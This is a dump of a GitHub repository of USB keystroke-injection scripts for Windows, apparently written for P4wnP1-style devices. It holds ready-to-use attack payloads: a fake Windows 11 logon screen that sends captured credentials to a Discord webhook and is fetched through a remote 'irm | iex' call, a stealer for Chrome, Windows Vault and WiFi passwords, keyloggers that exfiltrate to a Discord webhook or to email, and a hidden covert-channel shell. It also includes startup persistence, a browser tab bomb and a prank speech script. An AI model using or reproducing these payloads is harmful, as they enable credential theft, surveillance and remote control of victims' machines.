{$usrimg = "https://www.tenforums.com/geek/gars/images/2/types/thumb_14400082930User.png"} 18 | 19 | # HTML FOR COVER PAGE 20 | $h = @" 21 | 22 | 23 | 24 | 25 | 26 | 27 |  28 | 29 | 30 | 34 | 35 | 36 |
37 |
38 |
39 |
08:20
40 |
Tuesday, October 8
41 |
42 | 43 | 44 |
45 |
46 |
47 |
48 | 100 | 101 | 102 | "@ 103 | 104 | # HTML FOR LOGIN PAGE 105 | $h2 = @" 106 | 107 | 108 | 109 | 110 | 111 | 112 |  113 | 114 | 191 | 192 | 193 |
194 |
195 |
196 | User Image 197 |
198 |
199 |

$u

200 | 201 | 202 |

I forgot my $mthd

203 |
204 |
205 |
206 | 234 | 235 | 236 | "@ 237 | 238 | # SAVE HTML 239 | $p = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "index.html") 240 | $h | Out-File -Encoding UTF8 -FilePath $p 241 | $a = "file://$p" 242 | $p2 = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "login.html") 243 | $h2 | Out-File -Encoding UTF8 -FilePath $p2 244 | 245 | # KILL ANY BROWSERS (interfere with "Maximazed" argument) 246 | Start-Process -FilePath "taskkill" -ArgumentList "/F", "/IM", "chrome.exe", "/IM", "msedge.exe" -NoNewWindow -Wait 247 | Sleep -Milliseconds 100 248 | 249 | # START EDGE IN FULLSCREEN 250 | $edgeProcess = Start-Process -FilePath "msedge.exe" -ArgumentList "--kiosk --app=$a -WindowStyle Maximized" -PassThru 251 | $edgeProcess.WaitForInputIdle() 252 | 253 | Add-Type @" 254 | using System; 255 | using System.Runtime.InteropServices; 256 | public class Win32 { 257 | [DllImport("user32.dll")] 258 | public static extern IntPtr SetWindowPos(IntPtr hWnd, IntPtr hWndInsertAfter, int X, int Y, int cx, int cy, uint uFlags); 259 | public static readonly IntPtr HWND_TOPMOST = new IntPtr(-1); 260 | public static readonly IntPtr HWND_NOTOPMOST = new IntPtr(-2); 261 | public const uint SWP_NOMOVE = 0x2; 262 | public const uint SWP_NOSIZE = 0x1; 263 | public const uint SWP_SHOWWINDOW = 0x40; 264 | } 265 | "@ 266 | 267 | # SET EDGE AS TOP WINDOW AND START SCREENSAVER 268 | $null = [Win32]::SetWindowPos($edgeProcess.MainWindowHandle, [Win32]::HWND_TOPMOST, 0, 0, 0, 0, [Win32]::SWP_NOMOVE -bor [Win32]::SWP_NOSIZE -bor [Win32]::SWP_SHOWWINDOW) 269 | Sleep -Milliseconds 250 270 | $null = [Win32]::SetWindowPos($edgeProcess.MainWindowHandle, [Win32]::HWND_TOPMOST, 0, 0, 0, 0, [Win32]::SWP_NOMOVE -bor [Win32]::SWP_NOSIZE -bor [Win32]::SWP_SHOWWINDOW) 271 | Sleep -Milliseconds 250 272 | $black = Start-Process -FilePath "C:\Windows\System32\scrnsave.scr" 273 | -------------------------------------------------------------------------------- 
/Fast-Execution/Win11-Phishing/Fake-Windows-11-Logon.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's Fake Windows Logon Screen to Discord Webhook. 2 | // Author: @beigeworm 3 | // Description: This script kills all egde and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook. 4 | // Target: Windows 11 5 | // *SETUP* 6 | // replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 7 | 8 | // script setup 9 | layout("us") 10 | 11 | // Open Powershell and download script 12 | delay(1000); 13 | press("GUI r"); 14 | delay(1000); 15 | type("powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_win11_to_dc | iex"); 16 | delay(500); 17 | press("ENTER"); -------------------------------------------------------------------------------- /Fast-Execution/Win11-Phishing/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Fake Windows Logon Screen to Discord Webhook

3 | 4 | 5 | SYNOPSIS 6 | 7 | This script kills all egde and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook. 8 | 9 | USAGE 10 | 11 | 1. Replace YOUR_WEBBHOOK_HERE with your webhook. 12 | 2. Run script on target system. 13 | -------------------------------------------------------------------------------- /Fast-Execution/Win11-Phishing/main.ps1: -------------------------------------------------------------------------------- 1 | # GATHER SYSTEM AND USER INFO 2 | $u = (Get-WmiObject Win32_UserAccount -Filter "Name = '$Env:UserName'").FullName 3 | $c = $env:COMPUTERNAME 4 | $wpURL = "https://wallpapercave.com/wp/wp9378862.jpg" 5 | 6 | # DEFAULT LOGIN METHOD 7 | $value = Get-ItemPropertyValue -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\NgcPin" -Name "DeviceLockEnforcementPending" -ErrorAction SilentlyContinue 8 | if ($value -eq 0 -or $value -eq 1) {$mthd = "PIN"} else {$mthd = "Password"} 9 | 10 | # FIND ACCOUNT PICTURES 11 | $accountPicturesPath = "C:\ProgramData\Microsoft\Default Account Pictures" 12 | $imageFiles = Get-ChildItem -Path $accountPicturesPath -include "*.jpg", "*.png", "*.bmp" -File -Recurse 13 | if ($imageFiles.Count -gt 0) { 14 | $firstImage = $imageFiles[0].FullName 15 | $image = [System.Drawing.Image]::FromFile($firstImage) 16 | $usrimg = "$image" 17 | }else {$usrimg = "https://www.tenforums.com/geek/gars/images/2/types/thumb_14400082930User.png"} 18 | 19 | # HTML FOR COVER PAGE 20 | $h = @" 21 | 
08:20
Tuesday, October 8
63 | "@ 64 | 65 | # HTML FOR LOGIN PAGE 66 | $h2 = @" 67 | 68 | 69 | 70 | 71 | 72 | 73 |  74 | 75 | 152 | 153 | 154 |
155 |
156 |
157 | User Image 158 |
159 |
160 |

$u

161 | 162 | 163 |

I forgot my $mthd

164 |
165 |
166 |
167 | 195 | 196 | 197 | "@ 198 | 199 | # SAVE HTML 200 | $p = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "index.html") 201 | $h | Out-File -Encoding UTF8 -FilePath $p 202 | $a = "file://$p" 203 | $p2 = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "login.html") 204 | $h2 | Out-File -Encoding UTF8 -FilePath $p2 205 | 206 | # KILL ANY BROWSERS (interfere with "Maximazed" argument) 207 | Start-Process -FilePath "taskkill" -ArgumentList "/F", "/IM", "chrome.exe", "/IM", "msedge.exe" -NoNewWindow -Wait 208 | Sleep -Milliseconds 100 209 | 210 | # START EDGE IN FULLSCREEN 211 | $edgeProcess = Start-Process -FilePath "msedge.exe" -ArgumentList "--kiosk --app=$a -WindowStyle Maximized" -PassThru 212 | $edgeProcess.WaitForInputIdle() 213 | 214 | Add-Type @" 215 | using System; 216 | using System.Runtime.InteropServices; 217 | public class Win32 { 218 | [DllImport("user32.dll")] 219 | public static extern IntPtr SetWindowPos(IntPtr hWnd, IntPtr hWndInsertAfter, int X, int Y, int cx, int cy, uint uFlags); 220 | public static readonly IntPtr HWND_TOPMOST = new IntPtr(-1); 221 | public static readonly IntPtr HWND_NOTOPMOST = new IntPtr(-2); 222 | public const uint SWP_NOMOVE = 0x2; 223 | public const uint SWP_NOSIZE = 0x1; 224 | public const uint SWP_SHOWWINDOW = 0x40; 225 | } 226 | "@ 227 | 228 | # SET EDGE AS TOP WINDOW AND START SCREENSAVER 229 | $null = [Win32]::SetWindowPos($edgeProcess.MainWindowHandle, [Win32]::HWND_TOPMOST, 0, 0, 0, 0, [Win32]::SWP_NOMOVE -bor [Win32]::SWP_NOSIZE -bor [Win32]::SWP_SHOWWINDOW) 230 | Sleep -Milliseconds 250 231 | $null = [Win32]::SetWindowPos($edgeProcess.MainWindowHandle, [Win32]::HWND_TOPMOST, 0, 0, 0, 0, [Win32]::SWP_NOMOVE -bor [Win32]::SWP_NOSIZE -bor [Win32]::SWP_SHOWWINDOW) 232 | Sleep -Milliseconds 250 233 | $black = Start-Process -FilePath "C:\Windows\System32\scrnsave.scr" 234 | -------------------------------------------------------------------------------- /Fork-Bomb.js: 
-------------------------------------------------------------------------------- 1 | //========================== Mon's Tab Spammer ============================== 2 | 3 | //SYNOPSIS 4 | // This script will open Microsoft edge and open many tabs 5 | 6 | 7 | 8 | layout('us'); 9 | delay(500); 10 | press("GUI r"); 11 | delay(500); 12 | type("cmd"); 13 | delay(200) 14 | press("CTRL SHIFT ENTER"); 15 | delay(2000); 16 | press("ALT y"); 17 | delay(500); 18 | type("taskkill /F /IM msedge.exe /T > nul") 19 | delay(100); 20 | press("ENTER"); 21 | delay(200); 22 | type("exit") 23 | delay(100); 24 | press("ENTER"); 25 | delay(1000); 26 | press("GUI r"); 27 | delay(500); 28 | type("msedge.exe https://jonnybanana.github.io/HTML-Fork-Bomb.github.io"); 29 | delay(200) 30 | press("ENTER"); -------------------------------------------------------------------------------- /GetChromeWIFI.js: -------------------------------------------------------------------------------- 1 | //========================== Mon's Fake Windows Update ============================== 2 | 3 | //SYNOPSIS 4 | // This script will attempt to get saved browser passwords and wifi passwords 5 | 6 | 7 | layout("us") 8 | press("GUI r"); 9 | delay(500); 10 | type("powershell -Exec Bypass"); 11 | delay(500); 12 | press("CONTROL SHIFT ENTER"); 13 | delay(2000); 14 | press("ALT y"); 15 | delay(2000); 16 | type("Dism /online /Get-Intl"); 17 | press("ENTER") 18 | delay(1000); 19 | type("Set-WinSystemLocale en-US"); 20 | press("ENTER") 21 | delay(500); 22 | type("Set-WinUserLanguageList en-US -Force"); 23 | press("ENTER") 24 | delay(500); 25 | 26 | function assurePS32() { 27 | type("if ([IntPtr]::Size -ne 4){& $env:SystemRoot\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe}\n"); 28 | delay(2000); 29 | } 30 | assurePS32(); // open a 32bit console, if the current one is 64bit 31 | delay(2000); 32 | 33 | type('$h=(Get-Process -Id $pid).MainWindowHandle;$ios=[Runtime.InteropServices.HandleRef];$hw=New-Object $ios 
(1,$h);$i=New-Object $ios(2,0);(([reflection.assembly]::LoadWithPartialName("WindowsBase")).GetType("MS.Win32.UnsafeNativeMethods"))::SetWindowPos($hw,$i,0,0,1024,1024,16512)\n') 34 | type('start msedge.exe -kiosk https://fakeupdate.net/win8/\n') 35 | type('function Get-ChromeCreds() {Param([String]$Path );if ([String]::IsNullOrEmpty($Path)) {$Path = "$env:USERPROFILE\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data";}\n') 36 | type('if (![system.io.file]::Exists($Path)){Write-host \'Chrome db file doesnt exist, or invalid file path specified.\';Break;}\n') 37 | type('Add-Type -AssemblyName System.Security;$Stream = New-Object IO.FileStream -ArgumentList "$Path", \'Open\', \'Read\', \'ReadWrite\';$Encoding = [system.Text.Encoding]::GetEncoding(28591)\n') 38 | type('$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding;$BinaryText = $StreamReader.ReadToEnd();$StreamReader.Close();$Stream.Close()\n') 39 | type('$PwdRegex = [Regex] \'(\\x01\\x00\\x00\\x00\\xD0\\x8C\\x9D\\xDF\\x01\\x15\\xD1\\x11\\x8C\\x7A\\x00\\xC0\\x4F\\xC2\\x97\\xEB\\x01\\x00\\x00\\x00)[\\s\\S]*?(?=\\x68\\x74\\x74\\x70|\\Z)\'\n') 40 | type('$PwdMatches = $PwdRegex.Matches($BinaryText);$PwdNum = 0;$DecPwdArray = @();$PwdMatchCount = $PwdMatches.Count\n') 41 | type('Foreach ($Pwd in $PwdMatches) {$Pwd = $Encoding.GetBytes($PwdMatches[$PwdNum]);$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser);$DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt);$DecPwdArray += $DecPwd;$PwdNum += 1;}\n') 42 | type('$UserRegex = [Regex] \'(?<=\\x0D\\x0D\\x0D[\\s\\S]{2}\\x68\\x74\\x74\\x70)[\\s\\S]*?(?=\\x01\\x00\\x00\\x00\\xD0\\x8C\\x9D\\xDF\\x01\\x15\\xD1\\x11\\x8C\\x7A\\x00\\xC0\\x4F\\xC2\\x97\\xEB\\x01\\x00\\x00\\x00)\'\n') 43 | type('$UserMatches = $UserRegex.Matches($BinaryText);$UserNum = 0;$UserMatchCount = $UserMatches.Count;$UserArray = @() \n') 44 | type('if (-NOT 
($UserMatchCount -eq $PwdMatchCount)) { Write-host ([string]"The number of users is different than the number of passwords! This is most likely due to a regex mismatch.")} \n') 45 | type('$HTTP = "http";Foreach ($User in $UserMatches) {$User = $Encoding.GetBytes($UserMatches[$UserNum]);$User = $HTTPEnc + $User;$UserString = [System.Text.Encoding]::Default.GetString($User);$UserString = $HTTP + $UserString;$UserArray += $UserString;$UserNum += 1;} \n') 46 | type('$ArrayFinal = New-Object -TypeName System.Collections.ArrayList;for ($i = 0; $i -lt $UserNum; $i++) {;$ObjectProp = @{ \n') 47 | type('UserURL = $UserArray[$i];Password = $DecPwdArray[$i];};$obj = New-Object PSObject -Property $ObjectProp;$ArrayFinal.Add($obj) | Out-Null;};$ArrayFinal;}\n') 48 | type('\n') 49 | type('rm c:\\temp\\temp.txt\n') 50 | type('rm c:\\temp\\temp2.txt\n') 51 | type('rm c:\\temp\\temp3.txt\n') 52 | type('Get-ChromeCreds > c:\\temp\\temp.txt\n') 53 | type('$p4wnp1 = [System.IO.DriveInfo]::getdrives() |where-object {$_.VolumeLabel -match "EXFIL"}|sort {$_.name} |foreach-object {; echo "$(echo $_.name)";}\n') 54 | type('$ClassHolder = [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$VaultObj = new-object Windows.Security.Credentials.PasswordVault;$VaultObj.RetrieveAll() | foreach { $_.RetrievePassword(); $_ } | select Username,Password,resource > c:\\temp\\temp2.txt\n') 55 | type('$SSID=((netsh wlan show profiles key=clear));\n') 56 | type('for ($n=0;$n -le $SSID.count-1;$n++){try {;$fin = $fin + $SSID[$n]+((netsh wlan show profiles $SSID[$n].Substring($SSID[$n].Length -($SSID[$n].Length -1)) key=clear) -match \'Key C[^:]+:.(.+)$\').split(":")[1];} catch {};};$fin > c:\\temp\\temp3.txt \n') 57 | type('\n') 58 | type('cp c:\\temp\\temp.txt ($p4wnp1+$env:computername+"chrome.txt")\n') 59 | type('cp c:\\temp\\temp2.txt ($p4wnp1+$env:computername+"ie.txt")\n') 60 | type('cp c:\\temp\\temp3.txt ($p4wnp1+$env:computername+"wifi.txt")\n') 61 
| type('$fpid = Get-Process | where {$_.mainWindowTitle -like "*fakeupdate*"} | Select-Object -Property Id\n') 62 | type('kill $fpid.id\n') 63 | type('\n') 64 | type('exit\n') 65 | type('\n') 66 | type('\n') 67 | type('\n') -------------------------------------------------------------------------------- /Goose-from-SD.js: -------------------------------------------------------------------------------- 1 | // ============================================================================= 2 | // Title: Desktop Goose from SD card. 3 | // Author: @beigeworm | https://github.com/beigeworm 4 | // Description: Copy and start Desktop Goose from the SD card and add persistence. 5 | // Target: Windows 10 6 | // ============================================================================= 7 | 8 | // *USB SETTING* 9 | // exfil lootchest [REQUIRED] 10 | 11 | // ============================================================================= 12 | 13 | // Script Setup 14 | layout('us'); 15 | // typingSpeed(1,1); 16 | 17 | // Main Payload 18 | press("GUI r"); 19 | delay(500); 20 | type("powershell -NoP -NonI -Exec Bypass"); 21 | delay(500); 22 | press("CONTROL SHIFT ENTER"); 23 | delay(2000); 24 | press("ALT y"); 25 | delay(4000); 26 | 27 | // Copy Files (with persistence) 28 | type("copy d:/apps/goose.zip c:/ProgramData/Microsoft/Windows/\"Start Menu\"\n"); 29 | press("ENTER"); 30 | type("copy d:/apps/persoose.vbs \"c:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp/persoose.vbs\""); 31 | press("ENTER"); 32 | type("copy e:/apps/goose.zip c:/ProgramData/Microsoft/Windows/\"Start Menu\"\n"); 33 | press("ENTER"); 34 | type("copy e:/apps/persoose.vbs \"c:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp/persoose.vbs\""); 35 | press("ENTER"); 36 | type("copy f:/apps/goose.zip c:/ProgramData/Microsoft/Windows/\"Start Menu\"\n"); 37 | press("ENTER"); 38 | type("copy f:/apps/persoose.vbs \"c:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp/persoose.vbs\""); 39 | 
press("ENTER"); 40 | delay(2000); 41 | 42 | type("Expand-Archive -LiteralPath \"c:/ProgramData/Microsoft/Windows/Start Menu/goose.zip\""); 43 | type(" -DestinationPath \"c:/ProgramData/Microsoft/Windows/Start Menu\""); 44 | delay(200); 45 | press("ENTER"); 46 | delay(6000); 47 | 48 | type("start \"c:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp/persoose.vbs\" ; exit"); 49 | delay(200); 50 | press("ENTER"); 51 | type("exit"); 52 | press("ENTER"); 53 | -------------------------------------------------------------------------------- /HIDden-Voices.js: -------------------------------------------------------------------------------- 1 | hide=true; // set to true to hide the console window on the target 2 | 3 | layout("us") 4 | press("GUI r"); 5 | delay(500); 6 | type("powershell -NoP -NonI -Exec Bypass"); 7 | press("CONTROL SHIFT ENTER"); 8 | delay(2500); 9 | press("ALT y"); 10 | delay(3000); 11 | type("Dism /online /Get-Intl"); 12 | press("ENTER") 13 | type("Set-WinSystemLocale en-US"); 14 | press("ENTER") 15 | type("Set-WinUserLanguageList en-US -Force"); 16 | press("ENTER") 17 | delay(500); 18 | 19 | function hidePS() { 20 | type('$h=(Get-Process -Id $pid).MainWindowHandle;$ios=[Runtime.InteropServices.HandleRef];$hw=New-Object $ios (1,$h);$i=New-Object $ios(2,0);(([reflection.assembly]::LoadWithPartialName("WindowsBase")).GetType("MS.Win32.UnsafeNativeMethods"))::SetWindowPos($hw,$i,0,0,100,100,16512)') 21 | press("ENTER"); 22 | delay(1000); 23 | } 24 | 25 | if (hide) { hidePS(); } 26 | delay(2000); 27 | 28 | type("start-sleep 100;Add-Type -AssemblyName System.speech;$speak = New-Object System.Speech.Synthesis.SpeechSynthesizer;$speak.Speak(\"Hello. It's your Computer talking! look... I need a Break. I mean... I'm in bad shape, You treat me like shit, and somtimes I just.... well... 
nevermind\");start-sleep 20;exit") 29 | press("ENTER") -------------------------------------------------------------------------------- /Hidden-Wifi-Shell.js: -------------------------------------------------------------------------------- 1 | /* 2 | Controlling the server: 3 | - The WiFi covert channel server is bound to a screen session called 'wifi_c2' and can be attached 4 | to a SSH session by running: 5 | $ screen -d -r wifi_c2 6 | */ 7 | 8 | language="us"; 9 | hide=true; // set to true to hide the console window on the target 10 | 11 | // Hide an already opened PowerShell console, but keep input focus, to go on typing. The typed one-liner calls SetWindowPos (reached through MS.Win32.UnsafeNativeMethods in WindowsBase) on the console's own window handle with flags 16512 (0x4080, i.e. SWP_HIDEWINDOW combined with SWP_ASYNCWINDOWPOS). A console window that disappears right after launch is a triage signal. 12 | function hidePS() { 13 | type('$h=(Get-Process -Id $pid).MainWindowHandle;$ios=[Runtime.InteropServices.HandleRef];$hw=New-Object $ios (1,$h);$i=New-Object $ios(2,0);(([reflection.assembly]::LoadWithPartialName("WindowsBase")).GetType("MS.Win32.UnsafeNativeMethods"))::SetWindowPos($hw,$i,0,0,100,100,16512)') 14 | press("ENTER"); 15 | } 16 | 17 | // On a powershell prompt, check if the running PS is 32bit, start an inline 32bit PowerShell, otherwise. 
18 | function assurePS32() { 19 | type("if ([IntPtr]::Size -ne 4){& $env:SystemRoot\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe}\n"); 20 | delay(4000); 21 | } 22 | // hidDownAndIEX(vid, pid): types the two IDs into $USB_VID and $USB_PID, then a one-liner that aliases New-Object as "no", base64-decodes and gunzips the embedded string $b in memory and passes the resulting text to iex. This one-liner writes nothing to disk, so PowerShell script block logging is where the decoded stage becomes visible. 23 | function hidDownAndIEX(vid, pid) { 24 | type("$USB_VID='"+ vid +"';$USB_PID='" + pid +"';"); 25 | type("$b='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';nal no New-Object -F;iex (no IO.StreamReader(no IO.Compression.GZipStream((no IO.MemoryStream -A @(,[Convert]::FromBase64String($b))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()"); 26 | press("ENTER"); 27 | } 28 | 29 | // script setup 30 | layout("us"); 31 | //typingSpeed(2,4); 32 | 33 | waitLED(ANY_OR_NONE, 4000); 34 | 35 | // start an administrator PowerShell console (the -NoP -NonI -Exec Bypass command line typed here is recorded by process-creation logging with command-line capture) 36 | press("GUI r"); 37 | delay(1000); 38 | type("powershell -NoP -NonI -Exec Bypass"); 39 | delay(500); 40 | press("CONTROL SHIFT ENTER"); 41 | delay(2500); 42 | press("ALT y"); 43 | delay(4000); 44 | 45 | if (hide) { hidePS(); } //hide the console if chosen to do so 46 | delay(4000); 47 | assurePS32(); // open a 32bit console, if the current one is 64bit 48 | delay(4000); 49 | hidDownAndIEX("1D6B", "1315"); -------------------------------------------------------------------------------- /Keylogger to Discord.js: -------------------------------------------------------------------------------- 1 | // ============================================================================= 2 | // Title: Keylogger to Discord 3 | // Author: @beigeworm | https://github.com/beigeworm 4 | // Description: Uses Powershell to gather keystroke info and send it via Discord. 5 | // Target: Windows 10 6 | // ============================================================================= 7 | 8 | // *USB SETTING* 9 | // startup 10 | 11 | // *SETUP* 12 | // replace WEBHOOK_HERE with your discord webhook. 13 | // set $runtime=1 to desired interval between emails (in minutes). Default is 1 minute. 
14 | 15 | // ============================================================================= 16 | 17 | // Script Setup 18 | layout('us'); 19 | // typingSpeed(1,1); 20 | 21 | // Main Payload 22 | press("GUI r"); 23 | delay(1000); 24 | type("notepad"); 25 | delay(200); 26 | press("ENTER"); 27 | delay(3000); 28 | 29 | // write main Powershell code in notepad (it is saved further down as txtlog.ps1 under %temp%). The typed script declares user32.dll GetAsyncKeyState, GetKeyboardState, MapVirtualKey and ToUnicode through Add-Type, polls key codes 9 to 254 every 30 ms, appends the decoded characters to $env:temp\log.txt and later posts that file's content to the webhook URI. Detection: script block logging shows the Add-Type member definition with these imports, and a powershell.exe process posting to a webhook endpoint is unusual on most endpoints. 30 | type("Do{$whuri = \"WEBHOOK_HERE\" ;$RunTime = 1;$TimesRun = 1;$getT = Get-Date"); 31 | press("ENTER"); 32 | delay(200); 33 | type(";$end = $strt.addminutes($RunTime);function Start-Key($Path=\"$env:temp\\log.txt\"){$sigs = @'"); 34 | press("ENTER"); 35 | delay(200); 36 | type("[DllImport(\"user32.dll\", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode);"); 37 | press("ENTER"); 38 | delay(200); 39 | type("[DllImport(\"user32.dll\", CharSet=CharSet.Auto)] public static extern int GetKeyboardState(byte[] keystate);"); 40 | press("ENTER"); 41 | delay(200); 42 | type("[DllImport(\"user32.dll\", CharSet=CharSet.Auto)] public static extern int MapVirtualKey(uint uCode, int uMapType);"); 43 | press("ENTER"); 44 | delay(200); 45 | type("[DllImport(\"user32.dll\", CharSet=CharSet.Auto)] public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);"); 46 | press("ENTER"); 47 | delay(200); 48 | type("'@"); 49 | press("ENTER"); 50 | delay(200); 51 | type("$API = Add-Type -MemberDefinition $sigs -Name 'Win32' -Namespace API -PassThru;$null = New-Item -Path $Path -ItemType File -Force;try{$rnnr = 0;while ($TimesRun -ge $rnnr){"); 52 | press("ENTER"); 53 | delay(200); 54 | type("while ($end -ge $getT){Start-Sleep -Milliseconds 30;for($ascii = 9; $ascii -le 254; $ascii++){$state = $API::GetAsyncKeyState($ascii);if($state -eq -32767){$null = [console]::CapsLock"); 55 | press("ENTER"); 56 | delay(200); 57 | type("$virtualKey = $API::MapVirtualKey($ascii, 3);$kbstate = New-Object Byte[] 
256;$checkkbstate = $API::GetKeyboardState($kbstate);$mychar = New-Object -TypeName System.Text.StringBuilder"); 58 | press("ENTER"); 59 | delay(200); 60 | type("$success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0);if($success){[System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)}}}"); 61 | press("ENTER"); 62 | delay(200); 63 | type("$getT = Get-Date};$msg = Get-Content -Path $Path -Raw; $escmsg = $msg -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')}"); 64 | press("ENTER"); 65 | delay(200); 66 | type("$json = @{\"username\" = \"$env:COMPUTERNAME\""); 67 | press("ENTER"); 68 | delay(200); 69 | type("\"content\" = $escmsg} | ConvertTo-Json"); 70 | press("ENTER"); 71 | delay(200); 72 | type("Start-Sleep 1; Invoke-RestMethod -Uri $whuri -Method Post -ContentType \"application/json\" -Body $json; Start-Sleep 1; $whuri = \".\""); 73 | press("ENTER"); 74 | delay(200); 75 | type("Remove-Item -Path $Path -force}}finally{}}Start-Key}While ($a -le 5)"); 76 | press("ENTER"); 77 | delay(200); 78 | press("CONTROL SHIFT s"); 79 | delay(1000); 80 | type("%temp%"); 81 | delay(200); 82 | press("ENTER"); 83 | delay(200); 84 | type("txtlog.ps1"); 85 | press("TAB"); 86 | press("DOWN"); 87 | press("DOWN"); 88 | press("ENTER"); 89 | delay(200); 90 | press("ENTER"); 91 | delay(500); 92 | press("ALT F4"); 93 | delay(1000); 94 | 95 | // start Powershell script 96 | press("GUI r"); 97 | delay(1000); 98 | type("powershell -NoP -NonI -Exec Bypass -C $env:temp;sleep 1;Start txtlog.ps1;sleep 1;exit"); 99 | delay(200); 100 | press("ENTER"); 101 | delay(3000); 102 | press("ALT y"); -------------------------------------------------------------------------------- /Keylogger-to-Email.js: -------------------------------------------------------------------------------- 1 | // ============================================================================= 2 | // Title: Keylogger to Email 3 | // Author: 
@beigeworm | https://github.com/beigeworm 4 | // Description: Log key presses for a set period of time and send to an email repetedly. 5 | // Target: Windows 10 6 | // ============================================================================= 7 | 8 | // *REQUIREMENTS* 9 | // you will need a Microsoft Outlook Email address for this to work 10 | 11 | // *SETUP* 12 | // replace YOUR_EMAIL and YOUR_PASSWORD. (check entire script) 13 | // set $runtime=1 to desired interval beetween emails (in minutes). Default is 1 minute. 14 | 15 | // ============================================================================= 16 | 17 | // Script Setup 18 | layout('us'); 19 | // typingSpeed(1,1); 20 | 21 | // Main Payload 22 | press("GUI r"); 23 | delay(1000); 24 | type("notepad"); 25 | delay(200); 26 | press("ENTER"); 27 | delay(3000); 28 | 29 | // write main Powershell code in notepad 30 | type("Do{$FromTo = \"YOUR_EMAIL\";$Pass = \"YOUR_PASSWORD\";$RunTime = 1;$TimesRun = 1;$getT = Get-Date;$Subj = \"$env:COMPUTERNAME : log Results\";$body = \"$env:COMPUTERNAME : Results : $strt\""); 31 | press("ENTER"); 32 | delay(200); 33 | type("$SMTP = \"smtp.outlook.com\";$Prt = \"587\";$Creds = new-object Management.Automation.PSCredential $FromTo, ($Pass | ConvertTo-SecureString -AsPlainText -Force)"); 34 | press("ENTER"); 35 | delay(200); 36 | type("$Attachment = $strt = Get-Date;$end = $strt.addminutes($RunTime);function Start-Key($Path=\"$env:temp\\log.txt\"){$sigs = @'"); 37 | press("ENTER"); 38 | delay(200); 39 | type("[DllImport(\"user32.dll\", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode);"); 40 | press("ENTER"); 41 | delay(200); 42 | type("[DllImport(\"user32.dll\", CharSet=CharSet.Auto)] public static extern int GetKeyboardState(byte[] keystate);"); 43 | press("ENTER"); 44 | delay(200); 45 | type("[DllImport(\"user32.dll\", CharSet=CharSet.Auto)] public static extern int MapVirtualKey(uint uCode, int uMapType);"); 46 | 
press("ENTER"); 47 | delay(200); 48 | type("[DllImport(\"user32.dll\", CharSet=CharSet.Auto)] public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);"); 49 | press("ENTER"); 50 | delay(200); 51 | type("'@"); 52 | press("ENTER"); 53 | delay(200); 54 | type("$API = Add-Type -MemberDefinition $sigs -Name 'Win32' -Namespace API -PassThru;$null = New-Item -Path $Path -ItemType File -Force;try{$rnnr = 0;while ($TimesRun -ge $rnnr){"); 55 | press("ENTER"); 56 | delay(200); 57 | type("while ($end -ge $getT){Start-Sleep -Milliseconds 30;for($ascii = 9; $ascii -le 254; $ascii++){$state = $API::GetAsyncKeyState($ascii);if($state -eq -32767){$null = [console]::CapsLock"); 58 | press("ENTER"); 59 | delay(200); 60 | type("$virtualKey = $API::MapVirtualKey($ascii, 3);$kbstate = New-Object Byte[] 256;$checkkbstate = $API::GetKeyboardState($kbstate);$mychar = New-Object -TypeName System.Text.StringBuilder"); 61 | press("ENTER"); 62 | delay(200); 63 | type("$success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0);if($success){[System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)}}}"); 64 | press("ENTER"); 65 | delay(200); 66 | type("$getT = Get-Date};Sleep 3;send-mailmessage -from $FromTo -to $FromTo -subject $Subj -body $body -Attachment $Path -smtpServer $SMTP -port $Prt -credential $Creds -usessl"); 67 | press("ENTER"); 68 | delay(200); 69 | type("Remove-Item -Path $Path -force}}finally{$null = New-Item -Path $Path -ItemType File -Force}}Start-Key}While ($a -le 5)"); 70 | press("ENTER"); 71 | delay(200); 72 | press("CONTROL SHIFT s"); 73 | delay(1000); 74 | type("%temp%"); 75 | delay(200); 76 | press("ENTER"); 77 | delay(200); 78 | type("txtlog.ps1"); 79 | press("TAB"); 80 | press("DOWN"); 81 | press("DOWN"); 82 | press("ENTER"); 83 | delay(200); 84 | press("ENTER"); 85 | delay(500); 86 | press("ALT F4"); 87 | delay(1000); 88 | 89 | 
